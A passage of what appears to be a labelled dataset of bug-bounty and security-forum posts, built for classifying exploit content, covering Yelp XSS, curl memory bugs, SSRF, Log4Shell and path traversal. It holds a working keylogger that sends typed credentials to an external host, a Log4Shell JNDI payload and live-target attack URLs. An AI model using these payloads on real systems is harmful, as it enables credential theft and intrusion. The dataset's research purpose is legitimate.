browser. To demonstrate impact I'll show how this can be used to inject a keylogger on `https://biz.yelp.com/login` to steal email/password of a business account, as well as how it's possible to link an attackers Google account to a victims Yelp account, and gain access to the victims account via \"Sign in with Google\".\n\n# Description\n## XSS via \"guvo\" cookie\nThe value of the cookie `guvo` is reflected (unescaped) on some pages. Most interestingly on the frontpage of `www.yelp.com` and on the login page of `https://biz.yelp.com/login`. The unescaped reflection happens in the `window.ySitRepParams` object and the `window.yelp.guv` property. This can be seen by simply adding the cookie to the request in a browser or Burp, and observe the response:\n██████████\n█████████\n\n## Setting the \"yelpmainpaastacanary\" cookie\nThere is a feature on `yelp.com` where by adding the query parameter `?canary=asdf` to a request, the response will contain an HTTP header:\n```\nSet-Cookie: yelpmainpaastacanary=asdf; Domain=.yelp.com; Path=/; Secure; SameSite=Lax\n```\nThis gives us a way to set the cookie `yelpmainpaastacanary` to any value we want. But we need a way to control the `guvo` cookie. It turns out that we can smuggle the `guvo` cookie inside the `yelpmainpaastacanary` cookie.\n\n## Broken cookie parsing and cookie smuggeling\nThe Yelp backend will parse the users cookies by splitting them by spaces instead of semicolons. Normally cookies sent by the browser will be separated by semicolons like\n```\nCookie: a=1; b=2;\n```\nwhich should be parsed as 2 cookies `a` and `b`. But if we set a cookie like:\n```\nCookie: a=1 b=2;\n```\nThis should be parsed as 1 cookie `a` with the value \"`1 b=2`\", but Yelp will parse it as 2 cookies `a` and `b`. We can abuse this to smuggle the `guvo` cookie inside the `yelpmainpaastacanary` cookie by making a request to \n```\nhttps://www.yelp.com/?canary=asdf%20guvo%3D%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E\n```\n████\n\nwhich sets the cookie\n```\nSet-Cookie: yelpmainpaastacanary=asdf guvo=; Domain=.yelp.com; Path=/; Secure; \n```\nand results in our XSS payload triggering every time we visit the front page of `www.yelp.com`:\n{F2394020}\n\nAs an added bonus we can also inject a `Max-Age: 99999999` attribute so our cookie doesn't expire and will just live in the victims browser and wait for our XSS injection to happen:\n```\nhttps://www.yelp.com/?canary=asdf%20guvo%3D%3C%2Fscript%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3B%20Max%2DAge%3D99999999\n```\n```\nSet-Cookie: yelpmainpaastacanary=asdf guvo=; Max-Age=99999999; Domain=.yelp.com; Path=/; Secure; SameSite=Lax\n```\n\n# POCs\n_Please note: Since I'm in Denmark yelp.com will redirect to yelp.dk. The attacks work exactly the same on both domains._\n\n## Keylogger on biz.yelp.com/login\nThis javascript snippet will leak the content of the email and password fields on `https://biz.yelp.com/login` when the user types, or when the login form is submitted. The credentials are leaked to the domain `calc.sh` which I own:\n```javascript\nsetTimeout(function () {\n a = document.getElementsByName('password')[0];\n b = document.getElementsByName('email')[0];\n function f() {\n fetch(`https://calc.sh/?a=${encodeURIComponent(a.value)}&b=${encodeURIComponent(b.value)}`);\n }\n a.form.onclick=f;\n a.onchange=f;\n b.onchange=f;\n ", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-08-15", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "cf963b04028bf00023d8", "text": "[Out-of-bounds Read] CVE-2022-35260: .netrc parser out-of-bounds access\n\n## Summary:\nCurl expects the .netrc file to have space characters. So if there is no space character, it will do an out-of-bounds read and a 1-byte out-of-bounds write.\nThis can happen multiple times depending on the state of the memory.\n\n## Steps To Reproduce:\n\n `curl --netrc-file .netrc test.local`\n\".netrc\" is attached.\nThe content is 'a' for 4095 bytes.\nDepending on memory conditions, even single-byte files can cause problems.\n\nIt's not exactly just spaces and newlines.\nThe condition is that the .netrc file does not contain characters for which ISSPACE() returns true (so it is also a condition that there is no line feed code).\nThere is a problem with parsenetrc() in lib/netrc.c.\nparsenetrc() has the following loop.\n```\n while(!done && fgets(netrcbuffer, netrcbuffsize, file)) {\n char *tok;\n char *tok_end;\n bool quoted;\n if(state == MACDEF) {\n if((netrcbuffer[0] == '\\n') || (netrcbuffer[0] == '\\r'))\n state = NOTHING;\n else\n continue;\n }\n tok = netrcbuffer;\n while(tok) {\n while(ISSPACE(*tok))\n tok++;\n /* tok is first non-space letter */\n if(!*tok || (*tok == '#'))\n /* end of line or the rest is a comment */\n break;\n\n /* leading double-quote means quoted string */\n quoted = (*tok == '\\\"');\n\n tok_end = tok;\n if(!quoted) {\n while(!ISSPACE(*tok_end))\n tok_end++;\n *tok_end = 0;\n }\n```\nThe 'a' and the terminating character '\\0' in the .netrc file are characters for which ISSPACE() returns false, so while on line 25 is true(!false).\nThis causes an out-of-bounds read.\nAlso, line 27 is an out-of-bounds write. (1 byte for '\\0).\n\n## Remediation ideas:\nI think it would be better to include the condition that *tok is not NULL in the while statement.\n\n## Impact\n\nApplication crash plus other as yet undetermined consequences.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": ["CVE-2022-35260"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-10-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "104db6c580545893cf44", "text": "[Server-Side Request Forgery (SSRF)] Blind SSRF in FogBugz project import\n\n### Steps to reproduce\n\n1. Run GitLab `docker run --detach --hostname gitlab.example.com --publish 443:443 --publish 80:80 --publish 22:22 --name gitlab gitlab/gitlab-ce:latest`\n2. Connect to the GitLab Docker container: `docker exec -it gitlab /bin/bash`\n3. Install netcat: `apt update && apt install -y netcat`\n4. Run server in container: `nc -llvp 12345`\n5. Use http://localhost:12345 as FogBugz URL (see screenshot) \n{F602736}\n\n#### Results of GitLab environment info\n\n```\nroot@gitlab:/# gitlab-rake gitlab:env:info\n\nSystem information\nSystem: \nCurrent User: git\nUsing RVM: no\nRuby Version: 2.6.3p62\nGem Version: 2.7.9\nBundler Version:1.17.3\nRake Version: 12.3.2\nRedis Version: 3.2.12\nGit Version: 2.22.0\nSidekiq Version:5.2.7\nGo Version: unknown\n\nGitLab information\nVersion: 12.3.5\nRevision: 2417d5becc7\nDirectory: /opt/gitlab/embedded/service/gitlab-rails\nDB Adapter: PostgreSQL\nDB Version: 10.9\nURL: http://gitlab.example.com\nHTTP Clone URL: http://gitlab.example.com/some-group/some-project.git\nSSH Clone URL: git@gitlab.example.com:some-group/some-project.git\nUsing LDAP: no\nUsing Omniauth: yes\nOmniauth Providers: \n\nGitLab Shell\nVersion: 10.0.0\nRepository storage paths:\n- default: /var/opt/gitlab/git-data/repositories\nGitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell\nGit: /opt/gitlab/embedded/bin/git\n```\n\n## Impact\n\nThe vulnerability allows an attacker to make arbitrary requests inside a GitLab instance's network.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c2a67729cb685da1816d", "text": "I am also getting the VMWare-42 xx xx xx bunch of numbers if I get it from WMIC in command or get-wmiobject in powershell. Does anyone have any good advice on this?", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-09-17", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "133d3779ff23c878f273", "text": "[Improper Restriction of Authentication Attempts] Missing brute force protection for passwords of password protected share links\n\nHi Team,\n\nI hope you are doing well.\n\nVulnerability Name :- Bypass Password of Shared Files due to Lack of Rate Limit\n\nVulnerability Description :- Hi Team, I found a vulnerability in which I am able to bypass password protection of shared files due to lack of Rate limit.\n\nVulnerable URL :- https://efss.qloud.my/index.php/s/7ARMkjXJXAEz2kr\n\nSteps to Reproduce :- 1. Login --> Go to Files --> Set Password.\n2. Copy Shared Link.\n3. It looks like :- https://efss.qloud.my/index.php/s/7ARMkjXJXAEz2kr\n4. Open it in other browser .\n5. It asks for password .\n6. Enter random password.\n7. Capture this request in burp suite.\n8. Send to intruder and select that position and paste the payload list.\n10. Click on start attack and Boom! after few mins it got bypassed with Response code 303.\n\n## Impact\n\nIt leads to bypass the password of protected share files.\n\nPOC Attached\n\nIf you need further info I am here to help you.\n\nThanks and Regards,\nBhaRat", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-04-25", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "8b88b8ceb8f460d1b68e", "text": "[Unknown] S3 bucket takeover [learn2.khanacademy.org]\n\nThe subdomain learn2.khanacademy.org was pointed to Amazon S3, but no bucket with that name was registered [learn2.khanacademy.org]. This meant that anyone could sign up for Amazon S3, claim the bucket as their own and then serve content.\n\n## Steps to reproduce\n \nCheck the following url:\nhttp://learn2.khanacademy.org\n\nAlso\n\n```\n> curl -k http://learn2.khanacademy.org/\n\n\n \n S3 takeover POC\n \n \n

This is S3 takeover POC

\n \n\n```\n\n## Impact\n\nIt's extremely vulnerable to attacks as a malicious user could create any web page with any content and host it on the `ford.com` domain. This would allow them to post malicious content which would be mistaken for a valid site. \n\nThey could perform several attacks like:\n - Cookie Stealing\n - Phishing campaigns. \n - Bypass Content-Security Policies and CORS.\n \n## Recommendations for fix\n\n* Remove the affected DNS record\n \n\n### Supporting Material/References:\n\n - https://0xpatrik.com/subdomain-takeover/\n - https://hackerone.com/reports/661751", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-12-29", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "7c5cd9c2fdf78a9c806e", "text": "[Server-Side Request Forgery (SSRF)] SSRF via filter bypass due to lax checking on IPs\n\n## Summary:\nHello,\n\nI was reading up on the recent SSRF bug found on NextCloud which is originally a part of this [report](https://hackerone.com/reports/1608039) by @tomorrowisnew_ \n\nI went through the source code again which was highlighted in the report I mentioned and I noticed that filtering for some of the more advanced SSRF payloads were clearly missing. Alphanumeric payloads came to my mind when thinking about the same so I set up a local test environment with my friend @w1redch4d\n\nWe primarily focused on the code around the IP checking namely `ThowIfLocalIp`:\n```php\n\tpublic function ThrowIfLocalIp(string $ip) : void {\n\t\t$localRanges = [\n\t\t\t'100.64.0.0/10', // See RFC 6598\n\t\t\t'192.0.0.0/24', // See RFC 6890\n\t\t];\n\t\tif (\n\t\t\t(bool)filter_var($ip, FILTER_VALIDATE_IP) &&\n\t\t\t(\n\t\t\t\t!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) ||\n\t\t\t\tIpUtils::checkIp($ip, $localRanges)\n\t\t\t)) {\n\t\t\t$this->logger->warning(\"Host $ip was not connected to because it violates local access rules\");\n\t\t\tthrow new LocalServerException('Host violates local access rules');\n\t\t}\n\n\t\t// Also check for IPv6 IPv4 nesting, because that's not covered by filter_var\n\t\tif ((bool)filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV6) && substr_count($ip, '.') > 0) {\n\t\t\t$delimiter = strrpos($ip, ':'); // Get last colon\n\t\t\t$ipv4Address = substr($ip, $delimiter + 1);\n\n\t\t\tif (\n\t\t\t\t!filter_var($ipv4Address, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) ||\n\t\t\t\tIpUtils::checkIp($ip, $localRanges)) {\n\t\t\t\t$this->logger->warning(\"Host $ip was not connected to because it violates local access rules\");\n\t\t\t\tthrow new LocalServerException('Host violates local access rules');\n\t\t\t}\n\t\t}\n\t}\n```\nAs seen above, the code is more than capable of rooting out most of the SSRF payloads including IPv4 and IPv6 as well as the recently pointed out payload involving the Alibaba metadata IP `100.100.100.200`. But as stated above, the filtration technique fails when met with some of the more advanced SSRF payloads like the alphanumeric ones. In our test environment, we edited the code and set up a dummy website to test different payloads. The workflow was simple, if the payload was an invalid attempt at an SSRF, the server will throw an exception but if all the filtrations were bypassed successfully, the server would echo Pass.\n\n## Supporting Material/References:\nOur dummy code is as follows:\n```php\n 0) {\n $delimiter = strrpos($ip, ':'); // Get last colon\n $ipv4Address = substr($ip, $delimiter + 1);\n\n if (\n !filter_var($ipv4Address, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) ||\n IpUtils::checkIp($ip, $localRanges)) {\n throw new Exception('Host violates local access rules');\n }\n }\n echo \"Pass\";\n }\n ThrowIfLocalIp($_GET[\"ip\"])\n?>\n```\n\nHere are some of the screenshots:\n\n**Server catches exception for Alibaba metadata IP and doesn't echo Pass**\n{F1934403}\n{F1934404}\n\n**Server catches normal payload for AWS Magic IP and doesn't echo Pass**\n{F1934407}\n{F1934406}\n\n**Server passes the Alphanumeric payload for AWS Magic IP", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-02-10", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b392bd94a3cf922bb0bb", "text": "[Insufficiently Protected Credentials] Credential leak when use two url\n\n## Summary:\nCurl can leak user credentials if use two url.\n\n## Steps To Reproduce:\n\n\n 1. curl -I -v -u aaa:bbb hackerone.com curl.se\n 2. the output is:\n> Connected to hackerone.com (104.16.100.52) port 80 (#0) \n> Server auth using Basic with user 'aaa' \n> HEAD / HTTP/1.1 \n> Host: hackerone.com \n> Authorization: Basic YWFhOmJiYg== \n > User-Agent: curl/7.83.1 \n > Accept: */*\n\n> Connection #0 to host hackerone.com left intact \n>Trying 151.101.65.91:80... \n> Connected to curl.se (151.101.65.91) port 80 (#1) \n>Server auth using Basic with user 'aaa' \n > HEAD / HTTP/1.1 \n > Host: curl.se \n > Authorization: Basic YWFhOmJiYg== \n> User-Agent: curl/7.83.1 \n> Accept: */*\n \n 3. from the output we can see, the second url get the same credentials\n\n## Impact\n\nLeak of confidential information (user credential)", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-06-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "6c32e5f44c27935a5912", "text": "[Use After Free] CVE-2023-28319: UAF in SSH sha256 fingerprint check\n\n## Summary:\nThe fingerprint_b64 pointer is as parameter for failure logging after it is freed.\n\n## Steps To Reproduce:\n1. git clone https://github.com/curl/curl\n2. vim curl/lib/vssh/libssh2.c\n3. search for the string 'free(fingerprint_b64)' and note that fingerprint_b64 is used as parameter immediately after it is freed.\n\n## Supporting Material/References:\nThe following are the details of the code.\n\ngit commit a51f90ec0f74176776f5d14b99689f9241660eaa (HEAD -> master, origin/master, origin/HEAD)\n\nIn curl/lib/vssh/libssh2.c\n 653 static CURLcode ssh_check_fingerprint(struct Curl_easy *data)\n 654 {\n ...\n 667 char *fingerprint_b64 = NULL;\n ...\n 729 if((pub_pos != b64_pos) ||\n 730 strncmp(fingerprint_b64, pubkey_sha256, pub_pos)) {\n 731 free(fingerprint_b64);\n 732 \n 733 failf(data,\n 734 \"Denied establishing ssh session: mismatch sha256 fingerprint. \"\n 735 \"Remote %s is not equal to %s\", fingerprint_b64, pubkey_sha256);\n\nAccording to git blame, the following commits were involved:\n\nd1e7d9197b lib/vssh/libssh2.c (Mats Lindestam 2021-09-26 23:20:53 +0200 731) free(fingerprint_b64);\nd1e7d9197b lib/vssh/libssh2.c (Mats Lindestam 2021-09-26 23:20:53 +0200 732) \nd1e7d9197b lib/vssh/libssh2.c (Mats Lindestam 2021-09-26 23:20:53 +0200 733) failf(data,\nff2f3e8367 lib/vssh/libssh2.c (Daniel Stenberg 2022-04-25 11:41:20 +0200 734) \"Denied establishing ssh session: mismatch sha256 fingerprint. \"\nff2f3e8367 lib/vssh/libssh2.c (Daniel Stenberg 2022-04-25 11:41:20 +0200 735) \"Remote %s is not equal to %s\", fingerprint_b64, pubkey_sha256);\n\n## Impact\n\nDepends on which memory is the pointer fingerprint_b64 pointing to at the time failf() is called, it may either crash the application or it may print out whatever was in memory at the time leading to information leak in the fail log.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": ["CVE-2023-28319"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-24", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e83c9a5026ad6b509c14", "text": "[Cross-site Scripting (XSS) - DOM] Dom Xss vulnerability\n\n## Summary:\nDom Xss vulnerability\n\n## Steps To Reproduce:\n[add details for how we can reproduce the issue]\n\n 1. Go to this link: https://api.recordedfuture.com/index.html\n 2. Open chrome devtool and go to console tab\n 3. Type: document.write('......');\n 4. And boom! Alert 1!\n\n## Impact\n\nXSS can have huge implications for a web application and its users. User accounts can be hijacked, credentials could be stolen, sensitive data could be exfiltrated, and lastly, access to your client computers can be obtained.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c127743ac8a3b0b1fbe2", "text": "hey bro did you solve this problem? Create a “For” loop that encodes the variable “var” 28 times in “base64”. The number of characters in the 28th hash is the value that must be assigned to the “salt” variable. it gives me this error Extra arguments given. enc: Use -help for summary. can u help me please?", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-02-23", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "f7a377ac021e7683d54f", "text": "[Information Disclosure] an internel important paths disclosure [HtUS]\n\n## Summary:\ni found CGI script environment variable disclosure an important paths \n\n## Steps To Reproduce:\n\n\n 1. visit this link : https://███\n 2. look at poc pic \n\nyou should restrict this quickly\n\n## Impact\n\nthis is so dangerous because attacker now know an internal paths and this juicy information as u can see in poc pic he know now the mysql path , openssl config server admin and more ... etc", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c8a2d928ef051786b34e", "text": "[Unknown] [Javascript]: [Clipboard-based XSS]\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "1b61e47b9b4d90f8452d", "text": "[Path Traversal] Off-by-slash vulnerability in nodejs.org and iojs.org\n\n**Summary:** \nConfiguration files for Nginx in nodejs/build repository have multiple off-by-slash misconfigurations. Because nodejs.org and iojs.org are deployed using those files, it is possible for an attacker to gain access to unexpected directories. (**This report is not related to nodejs/node.** Therefore, I understand that this report is not eligible to Bounty.)\n\n**Description:** \nThe following files have multiple off-by-slash misconfigurations.\n- https://github.com/nodejs/build/blob/main/ansible/www-standalone/resources/config/nodejs.org\n- https://github.com/nodejs/build/blob/main/ansible/www-standalone/resources/config/iojs.org\n\nFor example, the following `/metrics` endpoint has no trailing slash, while the alias parameter has a trailing slash.\n```\n location /metrics {\n alias /home/dist/metrics/;\n autoindex on;\n default_type text/plain;\n }\n```\nThe setting as above is commonly known as an off-by-slash misconfiguration.\nIn this case, an attacker can access files in `/home/dist` directory via `/metrics../` endpoint.\n\n## Steps To Reproduce:\nFor example, you can browse the contents of `/home/dist/.bashrc` by accessing `https://nodejs.org/metrics../.bashrc`.\n\n## Impact: \nIf sensitive files exist in the dist user's home directory, it is possible for an attacker to view their contents.\n\n## Supporting Material/References:\n* https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf\n\n## Impact\n\nAn attacker can access files in the `/home/dist` directory of the nodejs.org and iojs.org servers.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-08-24", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "06e648e815d86110c58d", "text": "[Improper Access Control - Generic] Exposing Django Debug Panel and Sensitive Infrastructure Information at https://dev.fxprivaterelay.nonprod.cloudops.mozgcp.net\n\n## Summary:\nThis security report highlights the critical risks and issues associated with exposing the Django Debug Panel in a development environment available at https://dev.fxprivaterelay.nonprod.cloudops.mozgcp.net. The Django Debug Panel is a powerful tool used during application development, but enabling it in a development environment without proper access controls can lead to significant security vulnerabilities. The primary concern is the exposure of sensitive information about the infrastructure, such as the locations of Redis and PostgreSQL databases, user information, internal IP addresses and other details that can be exploited by attackers to launch potential attack vectors.\n\n## Steps To Reproduce:\nAccess the following URLs:\n- https://dev.fxprivaterelay.nonprod.cloudops.mozgcp.net//app/tmp/healthcheck.json\n- https://dev.fxprivaterelay.nonprod.cloudops.mozgcp.net/fxa-rp-events\n\nwhere you can find the full configuration exposed. The most interesting are:\n```\nADMIN_ENABLED \t\nTrue\nALLOWED_HOSTS \t\n['dev.fxprivaterelay.nonprod.cloudops.mozgcp.net',\n 'privacydev.fxprivaterelay.nonprod.cloudops.mozgcp.net']\n\nAUTHENTICATION_BACKENDS \t\n('django.contrib.auth.backends.ModelBackend',\n 'allauth.account.auth_backends.AuthenticationBackend')\nAUTH_USER_MODEL \t\n'auth.User'\nAVATAR_IMG_SRC \t\n['mozillausercontent.com', 'https://profile.stage.mozaws.net']\nAVATAR_IMG_SRC_MAP \t\n{'https://profile.accounts.firefox.com/v1': ['firefoxusercontent.com',\n 'https://profile.accounts.firefox.com'],\n 'https://profile.stage.mozaws.net/v1': ['mozillausercontent.com',\n 'https://profile.stage.mozaws.net']}\nAWS_REGION \t\n'us-east-1'\nAWS_SES_CONFIGSET \t\n'dev_fxprivaterelay_nonprod_cloudops_mozgcp_net'\nAWS_SNS_TOPIC \t\n{'arn:aws:sns:us-east-1:927034868273:fxprivaterelay-SES-processor-topic'}\nAWS_SQS_EMAIL_QUEUE_URL \t\n'██████████'\nAWS_SQS_QUEUE_URL \t\n'█████████'\nBASKET_ORIGIN \t\n'https://basket-dev.allizom.org'\nBUNDLE_PLAN_ID_US \t\n'price_1LwoSDJNcmPzuWtR6wPJZeoh'\nCACHES \t\n{'default': {'BACKEND': 'django_redis.cache.RedisCache',\n 'LOCATION': '████:19509',\n 'OPTIONS': {'CLIENT_CLASS': 'django_redis.client.DefaultClient'}}}\nCORS_ALLOWED_ORIGINS \t\n['https://vault.bitwarden.com', 'https://vault.qa.bitwarden.pw']\nDATABASES \t\n{'default': {'ATOMIC_REQUESTS': False,\n 'AUTOCOMMIT': True,\n 'CONN_HEALTH_CHECKS': False,\n 'CONN_MAX_AGE': 0,\n 'ENGINE': 'django.db.backends.postgresql',\n 'HOST': 'ec2-23-20-140-229.compute-1.amazonaws.com',\n 'NAME': 'dav509dnmoe86f',\n 'OPTIONS': {},\n 'PASSWORD': '********************',\n 'PORT': 5432,\n 'TEST': {'CHARSET': None,\n 'COLLATION': None,\n 'MIGRATE': True,\n 'MIRROR': None,\n 'NAME': None},\n 'TIME_ZONE': None,\n 'USER': 'zqhdtlumxotgdr'}}\nINSTALLED_APPS \t\n['whitenoise.runserver_nostatic',\n 'django.contrib.staticfiles',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.sites',\n 'django_filters',\n 'django_ftl.apps.DjangoFtlConfig',\n 'dockerflow.django',\n 'allauth',\n 'allauth.account',\n 'allauth.socialaccount',\n 'allauth.socialaccount.providers.fxa',\n 'rest_framework',\n 'rest_framework.authtoken',\n 'corsheaders',\n 'waffle',\n 'privaterelay.apps.PrivateRelayConfig',\n 'api.apps.ApiConfig',\n 'drf_spectacular',\n 'drf_spectacular_sidecar',\n 'debug_toolbar',\n 'django.contrib.admin',\n 'emails.apps.EmailsConfig',\n 'phones.apps.PhonesConfig']\nINTERNAL_IPS \t\n['███████']\nLOGGING \t\n{'formatters': {'json': {'()': 'dockerflow.logging.JsonLogFormatter',\n 'logger_name': 'fx-private-relay'}},\n 'handlers': {'console_err': {'class': 'logging.StreamHandler',\n ", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-10-13", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "21ae96f7237c932c20db", "text": "[Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)] Insecure randomness for default password in file sharing when password policy app is disabled\n\n## Summary:\nSharing links can be protected with a password. However, the function used for generating this password is using cryptographically insecure RNG.\n\n`server-25.0.0\\apps\\files_sharing\\src\\utils\\GeneratePassword.js` (lines 36-55):\n\n```php\nexport default async function() {\n\t// password policy is enabled, let's request a pass\n\tif (config.passwordPolicy.api && config.passwordPolicy.api.generate) {\n\t\ttry {\n\t\t\tconst request = await axios.get(config.passwordPolicy.api.generate)\n\t\t\tif (request.data.ocs.data.password) {\n\t\t\t\treturn request.data.ocs.data.password\n\t\t\t}\n\t\t} catch (error) {\n\t\t\tconsole.info('Error generating password from password_policy', error)\n\t\t}\n\t}\n\n\t// generate password of 10 length based on passwordSet\n\treturn Array(10).fill(0)\n\t\t.reduce((prev, curr) => {\n\t\t\tprev += passwordSet.charAt(Math.floor(Math.random() * passwordSet.length))\n\t\t\treturn prev\n\t\t}, '')\n}\n```\n\nThe first part of the function handles the password generation in a safe way when a password policy is present. However, there is another variant generating the password using `Math.random` function, which is not appropriate for use in a security-sensitive context.\n\nCitation from [MDN Web Docs](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Math/random):\n*\"Note: Math.random() does not provide cryptographically secure random numbers. Do not use them for anything related to security. Use the Web Crypto API instead, and more precisely the window.crypto.getRandomValues() method.\"*\n\n## Supporting Material/References:\n * https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Math/random\n * https://developer.mozilla.org/en-US/docs/Web/API/Crypto/getRandomValues\n\n## Impact\n\nAn attacker might be able to access the shared files even without knowledge of the password.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-03-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "62b92db4a3a3bfbfb120", "text": "Mitmproxy hacking plugin\n\nI stop using burp long time a go because it is closed source, then zap lately because I just can’t stand java, so I found for what I need (just a HTTP interceptor that I can modify information and pause/release) mitmproxy to be the perfect tool and very hackable and open source. So started to write a plugin to start using other tools inside it like gobuster, nikto, grab links and comments etc… Here is the pluging and here is the main site. I will be adding more features as I go, feel free to submit patches. Happy Hacking", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-11-09", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "067ba8372f75dad8e8e7", "text": "[Uncontrolled Resource Consumption] [CVE-2022-44570] Possible Denial of Service Vulnerability in Rack’s Range header parsing\n\nI made a report and patch at https://hackerone.com/reports/1668717.\n\nhttps://discuss.rubyonrails.org/t/cve-2022-44570-possible-denial-of-service-vulnerability-in-racks-range-header-parsing/82125\n> There is a possible denial of service vulnerability in the Range header parsing component of Rack. This vulnerability has been assigned the CVE identifier CVE-2022-44570.\n>Carefully crafted input can cause the Range header parsing component in Rack to take an unexpected amount of time, possibly resulting in a denial of service attack vector. Any applications that deal with Range requests (such as streaming applications, or applications that serve files) may be impacted.\n\n## Impact\n\nReDoS occurs when crafted values are sent to request headers.\nEspecially in Rails, access to public directories is affected.\n\nIt was possible to attack ReDoS on many servers without authentication, but in the case of this regular expression, if it is ruby 3.2 or higher, there is a memoization countermeasure, so it is not a threat.", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2022-44570"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-07-27", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "a86a2e49ae9baba7cedc", "text": "[Command Injection - Generic] LOGJ4 VUlnerability [HtUS]\n\n**Description:**\nHi team,\n\nlog4 shell is recent 0-day exploit it's Java package vulnerable. █████ is vulnerable\n\n**Impact**\n\nRCE\n\n**System Host(s)**\n\n██████\n\n**Affected Product(s) and Version(s)**\n\n**CVE Numbers**\n\nCVE-2021-44228\n\n**Steps to Reproduce**\n\n1. Go to this url => https://█████/?x=${jndi:ldap://${hostName}.uri.xxxxx.burpcollaborator.net/a}\n2. paste the poc code on parameter\n3. Then burp collaborator received reverse ping back\nPhotos below\n\n**POC CODE**\n${jndi:ldap://${hostName}.uri.xxxxx.burpcollaborator.net/a}\n\n**Suggested Mitigation/Remediation Actions**\nhttps://www.lunasec.io/docs/blog/log4j-zero-day/\n\n## Impact\n\nSuccessful attack leads Arbitary Code Execution on the application", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2021-44228"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-11-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "54bf735f8a64da72e923", "text": "[Cross-site Scripting (XSS) - Stored] Cross-site scripting on dashboard2.omise.co\n\n## Summary:\nCross-site scripting (XSS) is an attack vector that injects malicious code into a vulnerable web application.\nStored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application.\n\nSteps To Reproduce:\n1. Log in to your account.\n2. Visit https://dashboard.omise.co/test/settings \n3. Under Export - Specify the metadata that you want to include in your export option. Enter in all four parameters including Charge, Transfer, Refund, Dispute.\n4. Click on Update settings.\n5. Click on Try our new dashboard, XSS will Trigger or log out and log in again, and XSS will Trigger.\n\nPOC:\nAttached Video.\n\n## Impact\n\nCode injected into a vulnerable application can 